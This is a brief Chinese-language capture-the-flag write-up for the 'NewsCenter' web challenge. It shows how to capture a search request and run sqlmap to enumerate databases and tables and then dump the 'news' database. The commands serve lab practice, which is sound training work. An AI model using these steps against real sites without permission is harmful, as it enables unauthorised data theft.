攻防世界web高阶2分题(NewsCenter)
读题
发现是一个搜索框,觉得是个sql注入
随便输入什么,我这里输入aaa,然后抓包
PS:一定要抓搜索后的包
-
然后将抓到的包保存在桌面1.txt
-
然后用sqlmap注入
1、查找数据库
python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --dbs
2、查找news下的表
python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --tables -D news
3、建立可后台news库连接, 搜索所有的数据
python sqlmap.py -r D:\360data\重要数据\桌面\1.txt -D news --dump
PS:1.txt的路径一定要写具体路径